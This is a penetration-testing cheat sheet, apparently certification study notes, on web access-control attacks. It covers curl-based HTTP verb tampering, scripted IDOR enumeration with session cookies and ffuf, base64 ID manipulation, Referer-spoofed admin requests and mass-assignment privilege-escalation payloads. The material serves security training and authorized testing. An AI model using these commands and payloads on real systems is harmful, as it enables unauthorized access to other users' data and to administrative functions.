Web Attacks (IDOR / Verb Tampering / BFLA)
Access-control attacks from the CWES path: HTTP verb tampering, IDOR enumeration (including encoded IDs), and broken function-level authorization / mass assignment. Every payload separated.
HTTP verb tampering
Try HEAD instead of GET (may bypass auth):
curl -X HEAD http://IP/admin/Try PUT (may allow file creation):
curl -X PUT http://IP/admin/Bypass a POST-only filter by switching to GET:
curl -X GET http://IP/process.php -d "cmd=ls"Enumerate accepted verbs:
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do code=$(curl -s -o /dev/null -w "%{http_code}" -X $method http://TARGET/admin/resource); echo "$method: $code"; doneIDOR enumeration
Manual - iterate IDs and grep for output:
for i in {1..20}; do curl -s -b "PHPSESSID=SESSION" http://IP/profile.php?id=$i | grep "name:"; doneffuf automation (find IDs that return 200):
ffuf -w ids.txt -u "http://TARGET/api/users/FUZZ/profile" -H "Cookie: session=YOUR_SESSION" -fc 404,403Encoded ID - decode, modify, re-encode:
echo -n 'dXNlcjEudHh0' | base64 -decho -n 'user2.txt' | base64Access control models
Understanding the intended model helps spot where it breaks:
| Model | Description | Common flaw |
|---|---|---|
| DAC (Discretionary) | Owner grants access per resource | IDOR — resource IDs not validated per user |
| MAC (Mandatory) | System enforces labels (top secret, public) | Rarely web-app relevant |
| RBAC (Role-Based) | Role determines access (admin, user, viewer) | Role parameter trusted from client; horizontal priv esc |
| ABAC (Attribute-Based) | Access based on user/resource attributes | Attribute injection via request body |
Horizontal privilege escalation
Accessing another user’s resources at the same privilege level. Test by changing a user ID, username, or GUID to another user’s:
GET /api/profile?userId=1337 ← your ID
GET /api/profile?userId=1338 ← someone else'sGET /account/orders/ORDER-001 ← yours
GET /account/orders/ORDER-002 ← another user's orderVertical privilege escalation
Accessing functionality above your privilege level:
GET /admin/users ← as a regular user
POST /admin/deleteUser?id=5Try common admin paths with a low-privilege session in Burp Repeater.
Referer-based access control bypass
If the admin page checks that the Referer is /admin/main:
GET /admin/deleteUser?username=carlos HTTP/1.1
Referer: https://TARGET/admin/mainBFLA / mass assignment
Access admin endpoints directly with a regular-user token:
GET /admin/users
POST /api/admin/deleteUserRole escalation via request body - add privileged fields:
{"role": "admin"}{"isAdmin": true}Mass assignment via PATCH:
PATCH /api/users/123
{"email": "new@test.com", "role": "admin"}